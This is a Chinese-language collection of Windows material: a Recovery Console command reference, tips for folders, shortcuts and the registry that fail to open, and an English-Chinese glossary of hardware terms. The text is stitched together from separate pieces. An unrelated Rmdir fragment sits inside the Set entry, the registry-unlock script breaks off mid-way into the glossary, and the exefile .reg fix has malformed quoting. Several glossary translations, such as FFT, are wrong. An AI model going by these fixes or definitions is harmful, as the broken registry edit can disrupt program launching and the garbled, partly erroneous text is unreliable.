  要创建的分区大小,以兆字节 (MB)表示。仅与 /add 同时使用。

  范例

  下例将删除分区:

  diskpart /delete \ Device\ HardDisk0\ Partition3
  diskpart /delete F:

  下例将在硬盘上添加一个 20 MB 的分区:

  diskpart /add \ Device\ HardDisk0 20

  Fixboot

  向系统分区写入新的分区引导扇区。只有在使用故障恢复控制台时,才能使用 fixboot 命令。

  fixboot [drive]

  参数  驱动器

  将要写入引导扇区的驱动器。它将替代默认的驱动器(即用户登录的系统分区)。例如,驱动器:D:

  范例

  下列命令范例向驱动器 D:的系统分区写入新的分区引导扇区:

  fixboot d:

  注意: 如果不带任何参数,fixboot 命令将向用户登录的系统分区写入新的分区引导扇区。

  Fixmbr

  修复启动磁盘的 主启动记录。fixmbr 命令仅在使用故障恢复控制台时才可用。

  fixmbr [ device_name]

  参数

  device_name

  要写入新的主引导记录的设备(驱动器)。设备名称可从 map 命令的输出获得。例如,设备名称:

  \ Device\ HardDisk0

  范例

  下列命令示例向指定设备写入一个新的主引导记录:

  fixmbr \ Device\ HardDisk0

  注意

    · 如果不指定 device_name,新的主引导记录将被写入引导设备,即装载主系统的驱动器。
    · 如果系统检测到无效或非标准分区表标记,将提示用户是否继续执行该命令。除非您访问驱动器有问题,否则不要继续进行。向系统分区写入新的主引导记录可能破坏分区表并导致分区无法访问。


  Format

  将指定的驱动器格式化为指定的文件系统。含有下列参数的 format 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 format 命令。

  format [ drive:] [ /fs:file-system]

  参数

  drive: :指定要格式化的驱动器。不能从故障恢复控制台格式化软盘。

  /q :对驱动器进行快速格式化。不扫描驱动器看是否有坏区域,因此只应对以前格式化过的驱动器使用该参数。

  /fs:file-system :指定要使用的文件系统:FAT 、FAT32 或 NTFS 。如果未指定文件系统,将使用现有的文件系统格式。

  Map

  显示驱动器号与物理设备名称的映射。该信息在运行 fixboot 和 fixmbr 命令时非常有用。

  map 命令仅在使用故障恢复控制台时才可用。

  Map [ arc]

  参数

  arc :指示 map 命令显示高级 RISC 计算 (ARC)设备名称而不是设备名称。以下是 ARC 设备名称的范例:

  multi(0)disk(0)rdisk(0)partition(1)

  等价的设备名称是:

  \ Device\ HardDisk0\ Partition1

  范例

  下例将物理设备名映射为使用 ARC 设备名称的驱动器号:

  map arc

  注意

  · 如果不使用 arc 参数,则 map 命令显示设备名称。
  · map 命令还显示文件系统的类型和每个磁盘的大小 (MB)。


第三部分:辅助操作和特殊功能命令

Cls

  清除屏幕。

  清除后的屏幕只显示命令提示符和插入点。

  Disable

  禁用 Windows XP 、Windows 2000 或 Windows NT 4.0 系统服务或设备驱动程序。disable 命令仅在使用故障恢复控制台时才可用。

  disable {service_name] |[ device_driver_name}

  参数

  service_name :要禁用的系统服务名称。   device_driver_name :要禁用的设备驱动程序名称。

  范例

  下例将禁用 Eventlog 服务:

  disable eventlog

  注意

   · disable 命令将指定的服务或驱动程序的启动类型设为 SERVICE_DISABLED 。
   · 使用 disable 命令禁用系统服务或设备驱动程序时,该系统服务或设备驱动程序上次启动类型的名称将显示在屏幕上。应该记下该名称,以便在需要时使用 enable 命令将启动类型恢复为上次的设置。
   · 共有五种启动类型。前三种类型是:SERVICE_AUTO_START 、SERVICE_DISABLED 和SERVICE_DEMAND_START 。对应的标准启动类型:自动、禁用和手动,通常使用“计算机管理”管理工具中的“服务”进行配置。后两种类型是:SERVICE_BOOT_START 和SERVICE_SYSTEM_START,通常用于配置加载设备驱动程序的方式。例如,在启动计算机时或启动 Windows 时加载。

  Enable

  启用 Windows XP 、Windows 2000 或 Windows NT 4.0 系统服务或设备驱动程序。enable 命令仅在使用故障恢复控制台时才可用。

  enable {service_name |device_driver_name}[ startup_type]

  参数

  service_name :要启用的系统服务的名称。

  device_driver_name :要启用的设备驱动程序的名称。

  startup_type :要为服务或设备驱动程序指派的启动类型。有效的启动类型包括:

   · SERVICE_BOOT_START

   · SERVICE_SYSTEM_START

   · SERVICE_AUTO_START

   · SERVICE_DEMAND_START

  范例

  下例将 Eventlog 服务的启动类型设为自动或 SERVICE_AUTO_START:

  enable eventlog service_auto_start

  注意

   · 如果不指派启动类型,enable 命令将列出在 service_name 中指定的服务或设备驱动程序的当前启动类型。

   · 使用 enable 命令更改启动类型时,上次启动类型的名称将显示在屏幕上。应该记下该名称,以便在需要时将启动类型恢复为上次的设置。

  Exit

  关闭故障恢复控制台并重新启动计算机。exit 命令仅在使用“故障恢复控制台”时才可用。

  exit

  参数  无

  Help

  提供有关故障恢复控制台命令的联机信息。

  help [ commandname]

  参数  无

  列出故障恢复控制台中提供的命令。

  commandname

  提供有关命令信息,包括命令使用的参数。

  注意

   · 有两种方法可以获得命令的联机帮助。可以指定 help 命令后的命令名称,或者可以在命令提示符中键入该命令名称和 /?。开关。例如,键入下列命令可以获得有关extract 命令的信息:

    help extract
    extract /?

  Listsvc

  列出计算机上可以使用的服务和驱动程序。listsvc 命令仅在使用故障恢复控制台时才可用。

  listsvc

  参数  无

  Logon

  登录到 Windows 安装。logon 命令仅在使用故障恢复控制台时才可用。

  logon

  参数  无

  注意

   · logon 命令将列出所有检测到的 Windows 安装,需要安装的本地管理员密码才能登录。

   · 如果 3 次登录尝试都失败,“故障恢复控制台”会退出并且计算机将重新启动。

  Net use

  将网络共享连接到驱动器号。含有下列参数的 net use 命令仅在使用故障恢复控制台时可用。在命令提示符下可以使用带不同参数的 net use 命令。

  语法

  net use [ \ \ ComputerName\ ShareName [ /user:[ DomainName\ ] UserName] password] |[ drive
letter:] [ /d]

  参数

  \ \ servername\ sharename

  指定服务器和共享资源的名称。如果 computername 包含空白字符,则将计算机名从双反斜杠 (\ \ )到计算机名结尾用引号 (")括起来。计算机名长度可以是 1 到 15 个字符。

  /user

  指定建立连接的用户名。

  域名

  确认用户的凭据时所要使用的域名。

  用户名

  指定登录时使用的用户名。

  密码

  指定访问共享资源所需的密码。不输入密码,将给出要键入密码的提示。在密码提示行处键入密码时不显示密码。

  /d

  表示将不断开该连接。

  Set

  显示和设置“故障恢复控制台”的环境变量。set 命令是必须与安全模板一同使用的可选命令。

  含有不同参数的 set 命令仅在使用故障故障恢复控制台时可用。可在命令提示符下使用带不同参数的 set 命令。

  set [ variable=[ string] ]

  参数

  variable

  指定需要设置或修改的变量。

  “故障恢复控制台”支持以下环境变量:

    变量           说明

  AllowWildCards    允许某些命令(如 del 命令)支持通配符。

  AllowAllPaths    允许访问系统上的所有文件和目录。

  AllowRemovableMedia  允许文件复制到可移动媒体上,如软盘。

  NoCopyPrompt 覆盖现有文件时不显示提示。

  string

  指定要与指定变量关联的字符串。

  范例

  下例允许在某些故障恢复控制台命令中使用通配符:

  set allowwildcards=true

  指定要删除的目录的位置和名称。不能使用通配符。

  注意

   · 目录必须为空否则命令失败。

   · Rmdir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。

  Systemroot

  将当前目录设置为用户登录到的 Windows 安装系统的 systemroot 文件夹。systemroot 命令仅在使用故障恢复控制台时可用。

  systemroot

  参数  无

 

 

系统文件无法打开故障解决方法

我们在使用Windows操作系统的过程中,因为一些故障或者病毒的原因,造成了系统的一些文件夹和应用程序无法打开,而这些都是我们在使用电脑过程中所必须的,所以很多时
候这些故障让我们烦恼不已。如何解决这些故障呢?下面的文章中我们就给大家介绍一些Windows操作系统中一些常遇的“无法打开”故障解决技巧。

  无法打开“我的电脑”,“我的文档”等

  解决方法:可能是Explorer程序出错了,通过下面的方法可以解决相关故障

  一、打开记事本,将以下内容添加到记事本中,并保存为AAA.bat文件,然后打开,依次点确定即可(如还不可以请试下第二种方法);

regsvr32 appwiz.cpl
regsvr32 mshtml.dll
regsvr32 jscript.dll
regsvr32 msi.dll
regsvr32 "C:\Program Files\Common Files\System\Ole DB\Oledb32.dll"
regsvr32 "C:\Program Files\Common Files\System\Ado\Msado15.dll"
regsvr32 mshtmled.dll
regsvr32 /i shdocvw.dll
regsvr32 /i shell32.dll

  二、如果以上还不能修复,请将下面内容复制到记事本中,并保存为yezi.reg文件 然后打开;

  Windows Registry Editor Version 5.00
  [HKEY_CLASSES_ROOT\exefile\shell\Open\command]
  @=""%1" %*"

  文件夹无法打开

  解决方法:

  1、在资源浏览器或者我的电脑里面无法打开文件夹,双击鼠标不是打开文件夹而是进入了搜索界面可以修改注册表来恢复,进入注册表的HKEY_CLASSES_ROOT\Directory\shell,把find删除。还有一个方法就是点"文件夹"的"高级"选项里的"新建",在"操作"里输入"OpenNew",接着再在"用于执行操作的应用程序"里输入"Explorer %1"就行了。如果删除find,那不用配置。如果新建OpenNew,那还需把"Opennew"设为默认。

  2、在"我的电脑"中,无论打开哪个盘中的文件夹,都会出现"查找"的对话框,但用鼠标右键点击文件夹后选择"打开"后又能进入运行控制面板,双击"文件夹选项",点击"文件类型"标签,在"已注册的文件类型"列表下找到"文件夹"并选中它,单击"高级"按钮,在出现的"编辑文件类型"对话框中,如果只有"find"一项,则在"操作"下点击"新建"按钮,在"新操作"对话框的操作下面输入"Open",在"用于执行操作的应用程序"下面填入"C:\Windows\Explorer.exe",然后点击"确定",选中建立的"Open",点击"设为默认值"按钮;如果已经有"Open",则直接选中它并设成默认值即可。

  EFS加密文件夹无法打开怎么办

  解决方法:

  EFS(Encrypting File System,加密文件系统)是从Windows 2000开始就提出的一种基于NTFS文件系统的核心文件加密技术,主要是用于保护本地数据。在使用EFS加密文件的同时,也产生了诸多麻烦,比如重装系统后无法打开EFS加密过的文件夹等等,那么我们该如何解密?现在让我们先来看看大家的讨论。

  备份及导入密钥来解密

  为了防止在重装系统后无法打开加密文件夹,我们可以通过下面的方法来备份及导入密钥:点击“开始→运行”,输入“certmgr.msc”,回车后打开证书管理器。展开“证书/个人/证书”,右键单击在右侧窗口中以用户名为名称的证书,在“所有任务”中选择“导出”打开证书导出向导。单击“下一步”之后选择“是,导出私钥”,单击“下一步”,选择默认导出文件格式,再单击“下一步”,输入保护密码和确认密码,单击“下一步”后指定文件名,最后单击“完成”即可。

  这样在重装系统之后,右键单击导出的私钥文件,选择“安装PFX”之后就可以一步一步导入私钥。导入完成后,就可以顺利地打开EFS加密的文件夹。

  软件的方法不可靠

  在没有备份密钥的情况下,要对EFS解密几乎是不可能的,虽然网上流行很多种方法,但是可行性微乎其微,劝大家放弃。因为某些EFS使用的是公钥证书对文件加密,而且在Windows 2000/XP中,每一个用户都使用了惟一的SID(安全标志)。第一次加密文件夹时,系统会根据加密者的SID生成该用户的密钥,并且会将公钥和密钥分开保存。如果在重装系统之前没有对当前的密钥进行备份,那就意味着无论如何都不可能生成此前的用户密钥,而解密文件不仅需要公钥,还需要密码,所以也就根本不能打开此前EFS加密过的文件夹。

无法打开“添加/删除程序”

  导致无法打开“添加/删除程序”的原因可能是动态链接库文件注册失效了,只要重新注册这些文件就可以了。

  解决方法:在“开始→运行”中输入下列命令,并依次在弹出窗口中确认即可。

regsvr32 Appwiz.cpl
regsvr32 Jscript.dll
regsvr32 Mshtml.dll
regsvr32 Msi.dll
regsvr32 Mshtmled.dll
regsvr32 "c:\Program Files\Common Files\System\Ado\Msado15.dll"
regsvr32 "c:\Program Files\Common Files\System\Ole DB\Oledb32.dll"

 D盘无法打开的问题


  Windows XP操作系统笔者都经常遇到,D盘双击无法打开,点击右键一看,原来首先项是“自动播放”,所以就必须用右键中的打开才行,C盘和E盘双击打开正常。

  解
决方法:是Autorun.inf这个文件有问题,将属性去除掉后删除,然后在注册表中查找autorun.inf所指向的文件,查到后将shell这个子项删除,即可打开D盘。

  无法打开快捷方式

  现在我双击快捷方式后,总是没有反应,请问如何解决?

  其实,快捷方式和一般文件一样,都属于某种文件类型。如果快捷方式(*.lnk)所连接的程序丢失或错误,就会造成这类文件无法打开。解决的方法如下:

  1、Windows 2000 、Windows XP :

  运行“assoc .lnk=lnkfile”,然后重新启动即可。

  2、Windows 98 :

  下载lnkfile.reg。双击打开它,然后单击【确定】按钮,将该完整的注册表数据添加到当前系统的注册表中即可。

  局域网无法打开

  出现这种情况可能有两大类:

  (1)网络连接是正常的,所看到的也是即时的网络现状;

  (2). 所看到的只是一个假象,实际上网络连接不通。

  解决方法:对于前一种情况,我们就要介绍一下,网上邻居用户访问本机共享资源的用户身份,访问权限。通常我们通过网上邻居访问其它计算机资源是以“guest(来宾)”账号进行的,这一方面是大多数读者所不了解的,因为在实际的访问中,根本没有体现这一点。这个guest用户访问是不需输入任何密码的,用户名也不用,由系统默认了(就是guest)。正因如此,如果真正能看到共享资源,而且网络连接正常,则很可能是本机上的guest账户不可用。此时打开相应系统的用户账户管理程序查看的“guest”账号是否正常打开,如果“guest”账号前面的小图标上有一个红*,那表明“guest”账号当前被禁用,单击右键打开即可。

  至于如果网络连接根本不正常,却在网上邻居上看到了其他计算机上的共享资源,那就要涉及到在浏览服务原理介绍篇中所介绍的主浏览器缓存现象了,也有可能是在交换机上保留了主浏览器的浏览列表备份,虽然网络连接不正常,但由于在缓存中仍存有以前的浏览列表,所以仍看到了以前的共享资源。这主要出现在不正常退出系统情况下,如非正常关机、死机等。解决的办法当然就是重新检查网络连接和配置了,参见前面相关故障介绍。

  注册表无法打开

  解决方法:注册表是 Window 系统的中枢和心脏,它记录着操作系统中绝大多数的设置。在 Window 系统中有一个附带的注册表编辑工具,使用它可以很方便地访问和修改注册表,这就是Regedit。

  然而,现在网上的恶意程序利用注册表修改了IE的主页后,它不仅仅修改了注册表,而且为了防止您使用注册表程序修改会禁止使用注册表,当执行这一命令时,系统会弹出一个对话框:“注册表编辑 已被管管理员禁用。”这时注册表工具已被锁定。

  可以采用下面的两种方法来解决该问题:

  一、用脚本解决该问题

  让我们按以下步骤来解除锁定:

  1、点击“开始”菜单,从“程序”->“附件”中找到“记事本”命令并执行它。

  2、在记事本窗口中输入以下内容:REGEDIT4 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
 

《计算机英文术语完全介绍》

计算机英文术语完全介绍
1、CPU
3DNow!(3D no waiting)
ALU(Arithmetic Logic Unit,算术逻辑单元)
AGU(Address Generation Units,地址产成单元)
BGA(Ball Grid Array,球状矩阵排列)
BHT(branch prediction table,分支预测表)
BPU(Branch Processing Unit,分支处理单元)
Brach Pediction(分支预测)
CMOS(Complementary Metal Oxide Semiconductor,互补金属氧化物半导体)
CISC(Complex Instruction Set Computing,复杂指令集计算机)
CLK(Clock Cycle,时钟周期)
COB(Cache on board,板上集成缓存)
COD(Cache on Die,芯片内集成缓存)
CPGA(Ceramic Pin Grid Array,陶瓷针型栅格数组)
CPU(Center Processing Unit,中央处理器)
Data Forwarding(数据前送)
Decode(指令译码)
DIB(Dual Independent Bus,双独立总线)
EC(Embedded Controller,嵌入式控制器)
Embedded Chips(嵌入式处理器)
EPIC(explicitly parallel instruction code,并行指令代码)
FADD(Floationg Point Addition,浮点加)
FCPGA(Flip Chip Pin Grid Array,反转芯片针脚栅格数组)
FDIV(Floationg Point Divide,浮点除)
FEMMS(Fast Entry/Exit Multimedia State,快速进入/退出多媒体状态)
FFT(fast Fourier transform,快速热奥姆转换)
FID(FID:Frequency identify,频率鉴别号码)
FIFO(First Input First Output,先入先出队列)
flip-chip(芯片反转)
FLOP(Floating Point Operations Per Second,浮点操作/秒)
FMUL(Floationg Point Multiplication,浮点乘)
FPU(Float Point Unit,浮点运算单元)
FSUB(Floationg Point Subtraction,浮点减)
HL-PBGA(表面黏着,高耐热、轻薄型塑料球状矩阵封装)
IA(Intel Architecture,英特尔架构)
ICU(Instruction Control Unit,指令控制单元)
ID(identify,鉴别号码)
IDF(Intel Developer Forum,英特尔开发者论坛)
IEU(Integer Execution Units,整数执行单元)
IMM(Intel Mobile Module,英特尔移动模块)
Instructions Cache(指令缓存)
Instruction Coloring(指令分类)
IPC(Instructions Per Clock Cycle,指令/时钟周期)
ISA(instruction set architecture,指令集架构)
KNI(Katmai New Instructions,Katmai新指令集,即SSE)
Latency(潜伏期)
LDT(Lightning Data Transport,闪电数据传输总线)
Local Interconnect(局域互连)
MESI(Modified,Exclusive,Shared,Invalid:修改、排除、共享、废弃)
MMX(MultiMedia Extensions,多媒体扩展指令集)
MMU(Multimedia Unit,多媒体单元)
MFLOPS(Million Floationg Point/Second,每秒百万个浮点操作)
MHz(Million Hertz,兆赫兹)
MP(Multi-Processing,多重处理器架构)
MPS(MultiProcessor Specification,多重处理器规范)
MSRs(Model-Specific Registers,特别模块寄存器)
NAOC(no-account OverClock,无效超频)
NI(Non-Intel,非英特尔)
OLGA(Organic Land Grid Array,基板栅格数组)
OoO(Out of Order,乱序执行)
PGA(Pin-Grid Array,引脚网格数组,耗电大)
PR(Performance Rate,性能比率)
PSN(Processor Serial numbers,处理器序列号)
PIB(Processor In a Box,盒装处理器)
PPGA(Plastic Pin Grid Array,塑料针状矩阵封装)
PQFP(Plastic Quad Flat Package,塑料方块平面封装)
RAW(Read after Write,写后读)
Register Contention(抢占寄存器)
Register Pressure(寄存器不足)
Register Renaming(寄存器重命名)
Remark(芯片频率重标识)
Resource contention(资源冲突)
Retirement(指令引退)
RISC(Reduced Instruction Set Computing,精简指令集计算机)
SEC(Single Edge Connector,单边连接器)
Shallow-trench isolation(浅槽隔离)
SIMD(Single Instruction Multiple Data,单指令多数据流)
SiO2F(Fluorided Silicon Oxide,二氧氟化硅)
SMI(System Management Interrupt,系统管理中断)
SMM(System Management Mode,系统管理模式)
SMP(Symmetric Multi-Processing,对称式多重处理架构)
SOI(Silicon-on-insulator,绝缘体硅片)
SONC(System on a chip,系统集成芯片)
SPEC(System Performance Evaluation Corporation,系统性能评估测试)
SQRT(Square Root Calculations,平方根计算)
SSE(Streaming SIMD Extensions,单一指令多数据流扩展)
Superscalar(超标量体系结构)
TCP(Tape Carrier Package,薄膜封装,发热小)
Throughput(吞吐量)
TLB(Translate Look side Buffers,翻译旁视缓冲器)
USWC(Uncacheabled Speculative Write Combination,无缓冲随机联合写操作)
VALU(Vector Arithmetic Logic Unit,向量算术逻辑单元)
VLIW(Very Long Instruction Word,超长指令字)
VPU(Vector Permutate Unit,向量排列单元)
VPU(vector processing units,向量处理单元,即处理MMX、SSE等SIMD指令的地方)

2、主板
ADIMM(advanced Dual In-line Memory Modules,高级双重内嵌式内存模块)
AMR(Audio/Modem Riser;音效/调制解调器主机板附加直立插卡)
AHA(Accelerated Hub Architecture,加速中心架构)
ASK IR(Amplitude Shift Keyed Infra-Red,长波形可移动输入红外线)
ATX(AT Extend,扩展型AT)
BIOS(Basic Input/Output System,基本输入/输出系统)
CSE(Configuration Space Enable,可分配空间)
DB(Device Bay,设备插架)
DMI(Desktop Management Interface,桌面管理接口)
EB(Expansion Bus,扩展总线)
EISA(Enhanced Industry Standard Architecture,增强形工业标准架构)
EMI(Electromagnetic Interference,电磁干扰)
ESCD(Extended System Configuration Data,可扩展系统配置数据)
FBC(Frame Buffer Cache,帧缓冲缓存)
FireWire(火线,即IEEE1394标准)
FSB(Front Side Bus,前置总线,即外部总线)
FWH( Firmware Hub,固件中心)
GMCH(Graphics & Memory Controller Hub,图形和内存控制中心)
GPIs(General Purpose Inputs,普通操作输入)
ICH(Input/Output Controller Hub,输入/输出控制中心)
IR(infrared ray,红外线)
IrDA(infrared ray,红外线通信接口可进行局域网存取和档共享)
ISA(Industry Standard Architecture,工业标准架构)
ISA(instruction set architecture,工业设置架构)
MDC(Mobile Daughter Card,移动式子卡)
MRH-R(Memory Repeater Hub,内存数据处理中心)
MRH-S(SDRAM Repeater Hub,SDRAM数据处理中心)
MTH(Memory Transfer Hub,内存转换中心)
NGIO(Next Generation Input/Output,新一代输入/输出标准)
P64H(64-bit PCI Controller Hub,64位PCI控制中心)
PCB(printed circuit board,印刷电路板)
PCBA(Printed Circuit Board Assembly,印刷电路板装配)
PCI(Peripheral Component Interconnect,互连外围设备)
PCI SIG(Peripheral Component Interconnect Special Interest Group,互连外围设备专业组)
POST(Power On Self Test,加电自测试)
RNG(Random number Generator,随机数字发生器)
RTC(Real Time Clock,实时时钟)
KBC(KeyBroad Control,键盘控制器)
SBA(Side Band Addressing,边带寻址)
SMA(Share Memory Architecture,共享内存结构)
STD(Suspend To Disk,磁盘唤醒)
STR(Suspend To RAM,内存唤醒)
SVR(Switching Voltage Regulator,交换式电压调节)
USB(Universal Serial Bus,通用串行总线)
USDM(Unified System Diagnostic Manager,统一系统监测管理器)
VID(Voltage Identification Definition,电压识别认证)
VRM (Voltage Regulator Module,电压调整模块)
ZIF(Zero Insertion Force,零插力)

主板技术
技嘉
ACOPS: Automatic CPU OverHeat Prevention System(CPU过热预防系统)
SIV: System Information Viewer(系统信息观察)
盘英
ESDJ(Easy Setting Dual Jumper,简化CPU双重跳线法)
浩鑫
UPT(USB、PANEL、LINK、TV-OUT四重界面)

芯片组
ACPI(Advanced Configuration and Power Interface,先进设置和电源管理)
AGP(Accelerated Graphics Port,图形加速接口)
I/O(Input/Output,输入/输出)
MIOC(Memory and I/O Bridge Controller,内存和I/O桥控制器)
NBC(North Bridge Chip,北桥芯片)
PIIX(PCI ISA/IDE Accelerator,加速器)
PSE36(Page Size Extension 36-bit,36位页面尺寸扩展模式)
PXB(PCI Expander Bridge,PCI增强桥)
RCG(RAS/CAS Generator,RAS/CAS发生器)
SBC(South Bridge Chip,南桥芯片)
SMB(System Management Bus,全系统管理总线)
SPD(Serial Presence Detect,内存内部序号检测装置)
SSB(Super South Bridge,超级南桥芯片)
TDP(Triton Data Path,数据路径)
TSC(Triton System Controller,系统控制器)
QPA(Quad Port Acceleration,四界面加速)

3、显示设备
ASIC(Application Specific Integrated Circuit,特殊应用集成电路)
ASC(Auto-Sizing and Centering,自动调效屏幕尺寸和中心位置)
BLA(Bearn Landing Area,电子束落区)
CRC(Cyclical Redundancy Check,循环冗余检查)
CRT(Cathode Ray Tube,阴极射线管)
DDC(Display Data Channel,显示数据信道)
DFL(Dynamic Focus Lens,动态聚焦)
DFS(Digital Flex Scan,数字伸缩扫描)
DIC(Digital Image Control,数字图像控制)
Digital Multiscan II(数字式智能多频追踪)
DLP(digital Light Processing,数字光处理)
DOSD(Digital On Screen Display,同屏数字化显示)
DPMS(Display Power Management Signalling,显示能源管理信号)
DQL(Dynamic Quadrapole Lens,动态四极镜)
DSP(Digital Signal Processing,数字信号处理)
EFEAL(Extended Field Elliptical Aperture Lens,可扩展扫描椭圆孔镜头)
FRC(Frame Rate Control,帧比率控制)
LCD(liquid crystal display,液晶显示屏)
LCOS(Liquid Crystal On Silicon,硅上液晶)
LED(light emitting diode,光学二级管)
L-SAGIC(Low Power-Small Aperture G1 wiht Impregnated Cathode,低电压光圈阴极管)
LVDS(Low Voltage Differential Signal,低电压差动信号)
MALS(Multi Astigmatism Lens System,多重散光聚焦系统)
MDA(Monochrome Adapter,单色设备)
MS(Magnetic Sensors,磁场感应器)
Porous Tungsten(活性钨)
RSDS(Reduced Swing Differential Signal,小幅度摆动差动信号)
Shadow Mask(阴罩式)
TDT(Timeing Detection Table,资料测定表)
TICRG(Tungsten Impregnated Cathode Ray Gun,钨传输阴级射线枪)
TFT(thin film transistor,薄膜晶体管)
VAGP(Variable Aperature Grille Pitch,可变间距光栅)
VBI(Vertical Blanking Interval,垂直空白间隙)
VDT(Video Display Terminals,视频显示终端)
VRR(Vertical Refresh Rate,垂直扫描频率)

4、视频
3D(Three Dimensional,三维)
3DS(3D SubSystem,三维子系统)
AE(Atmospheric Effects,雾化效果)
AFR(Alternate Frame Rendering,交替渲染技术)
Anisotropic Filtering(各向异性过滤)
APPE(Advanced Packet Parsing Engine,增强形帧解析引擎)
AV(Analog Video,模拟视频)
Back Buffer(后置缓冲)
Backface culling(隐面消除)
Battle for Eyeballs(眼球大战,各3D图形芯片公司为了争夺用户而作的竞争)
Bilinear Filtering(双线性过滤)
CG(Computer Graphics,计算机生成图像)
Clipping(剪贴纹理)
Clock Synthesizer(时钟合成器)
compressed textures(压缩纹理)
Concurrent Command Engine(协作命令引擎)
Center Processing Unit Utilization(中央处理器占用率)
DAC(Digital to Analog Converter,数模传换器)
Decal(印花法,用于生成一些半透明效果,如:鲜血飞溅的场面)
DFP(Digital Flat Panel,数字式平面显示器)
DFS: Dynamic Flat Shading(动态平面描影,可用作加速)
Dithering(抖动)
Directional Light(方向性光源)
DME: Direct Memory Execute(直接内存执行)
DOF(Depth of Field,多重境深)
dot texture blending(点型纹理混和)
Double Buffering(双缓冲区)
DIR(Direct Rendering Infrastructure,基层直接渲染)
DVI(Digital Video Interface,数字视频接口)
DxR(DynamicXTended Resolution,动态可扩展分辨率)
DXTC(Direct X Texture Compress,DirectX纹理压缩,以S3TC为基础)
Dynamic Z-buffering(动态Z轴缓冲区),显示物体远近,可用作远景
E-DDC(Enhanced Display Data Channel,增强形视频数据信道协议,定义了显示输出与主系统之间的通讯信道,能提高显示输出的画面质量)
Edge Anti-aliasing(边缘抗锯齿失真)
E-EDID(Enhanced Extended Identification Data,增强形扩充身份辨识数据,定义了计算机通讯视频主系统的数据格式)
Execute Buffers(执行缓冲区)
environment mapped bump mapping(环境凹凸映射)
Extended Burst Transactions(增强式突发处理)
Front Buffer(前置缓冲)
Flat(平面描影)
Frames rate is King(帧数为王)
FSAA(Full Scene Anti-aliasing,全景抗锯齿失真)
Fog(雾化效果)
flip double buffered(反转双缓存)
fog table quality(雾化表画质)
GART(Graphic Address Remappng Table,图形地址重绘表)
Gouraud Shading(高洛德描影,也称为内插法均匀涂色)
GPU(Graphics Processing Unit,图形处理器)
GTF(Generalized Timing Formula,一般程序时间,定义了产生画面所需要的时间,包括了诸如画面刷新率等)
HAL(Hardware Abstraction Layer,硬件抽像化层)
hardware motion compensation(硬件运动补偿)
HDTV(high definition television,高清晰度电视)
HEL: Hardware Emulation Layer(硬件模拟层)
high triangle count(复杂三角形计数)
ICD(Installable Client Driver,可安装客户端驱动程序)
IDCT(Inverse Discrete Cosine Transform,非连续反余弦变换,GeForce的DVD硬件强化技术)
Immediate Mode(直接模式)
IPPR(Image Processing and Pattern Recognition,图像处理和模式识别)
large textures(大型纹理)
LF(Linear Filtering,线性过滤,即双线性过滤)
lighting(光源)
Local Peripheral Bus(局域边缘总线)
mipmapping(MIP映射)
Modulate(调制混合)
Motion Compensation(动态补偿)
motion blur(动态模糊)
MPPS(Million Pixels Per Second,百万个像素/秒)
Multi-Resolution Mesh(多重分辨率组合)
Multi Threaded Bus Master(多重主控)
Multitexture(多重纹理)
nerest Mipmap(邻近MIP映射,又叫点采样技术)
Overdraw(透支,全景渲染造成的浪费)
partial texture downloads(并行纹理传输)
Parallel Processing Perspective Engine(平行透视处理器)
PC(Perspective Correction,透视纠正)
PGC(Parallel Graphics Configuration,并行图像设置)
pixel(P像素,屏幕上的像素点)
point light(一般点光源)
point sampling(点采样技术,又叫邻近MIP映射)
Precise Pixel Interpolation(精确像素插值)
Procedural textures(可编程纹理)
RAMDAC(Random Access Memory Digital to Analog Converter,随机内存数/模转换器)
Reflection mapping(反射贴图)
render(着色或渲染)
S3(Sight、Sound、Speed,视频、音频、速度)
S3TC(S3 Texture Compress,S3纹理压缩,仅支持S3显卡)
S3TL(S3 Transformation & Lighting,S3多边形转换和光源处理)
Screen Buffer(屏幕缓冲)
SDTV(Standard Definition Television,标准清晰度电视)
Shading(描影)
Single Pass Multi-Texturing(单通道多纹理)
SLI(Scanline Interleave,扫描线间插,3Dfx的双Voodoo 2配合技术)
Smart Filter(智能过滤)
soft shadows(柔和阴影)
soft reflections(柔和反射)
spot light(小型点光源)
SRA(Symmetric Rendering Architecture,对称渲染架构)
Stencil Buffers(范本缓冲)
Stream Processor(流线处理)
SuperScaler Rendering(超标量渲染)
texel(T像素,纹理上的像素点)
Texture Fidelity(纹理真实性)
texture swapping(纹理交换)
T&L(Transform and Lighting,多边形转换与光源处理)
T-Buffer(T缓冲,3dfx Voodoo4的特效,包括全景反锯齿Full-scene Anti-Aliasing、动态模糊Motion Blur、焦点模糊Depth of Field Blur、柔和阴影Soft Shadows、柔和反射Soft Reflections)
TCA(Twin Cache Architecture,双缓存结构)
Transparency(透明状效果)
Transformation(三角形转换)
Trilinear Filtering(三线性过滤)
Texture Modes(材质模式)
TMIPM(Trilinear MIP Mapping,三次线性MIP材质贴图)
UMA(Unified Memory Architecture,统一内存架构)
Visualize Geometry Engine(可视化几何引擎)
Vertical Interpolation(垂直调变)
VIP(Video Interface Port,视频接口)
ViRGE(Video and Rendering Graphics Engine,视频描写图形引擎)
Voxel(Volume pixels,立体像素,Novalogic的技术)
VQTC(Vector-Quantization Texture Compression,向量纹理压缩)
VSIS(Video Signal Standard,视频信号标准)
v-sync(同步刷新)
Z Buffer(Z缓存)

5、音频
3DPA(3D Positional Audio,3D定位音频)
AC(Audio Codec,音频多媒体数字信号编译码器)
Auxiliary Input(辅助输入接口)
CS(Channel Separation,声道分离)
DS3D(DirectSound 3D Streams)
DSD(Direct Stream Digital,直接数字信号流)
DSL(Down Loadable Sample,可下载的取样音色)
DLS-2(Downloadable Sounds Level 2,第二代可下载音色)
EAX(Environmental Audio Extensions,环境音效扩展技术)
FM(Frequency Modulation,频率调制)
FR(Frequence Response,频率响应)
FSE(Frequency Shifter Effect,频率转换效果)
HRTF(Head Related Transfer Function,头部关联传输功能)
IAS(Interactive Around-Sound,交互式环绕声)
MIDI(Musical Instrument Digital Interface,乐器数字接口)
NDA(non-DWORD-aligned ,非DWORD排列)
Raw PCM: Raw Pulse Code Modulated(元脉码调制)
RMA(RealMedia Architecture,实媒体架构)
RTSP(Real Time Streaming Protocol,实时流协议)
SACD(Super Audio CD,超级音乐CD)
SNR(Signal to Noise Ratio,信噪比)
S/PDIF(Sony/Phillips Digital Interface,索尼/飞利普数字接口)
SRS(Sound Retrieval System,声音修复系统)
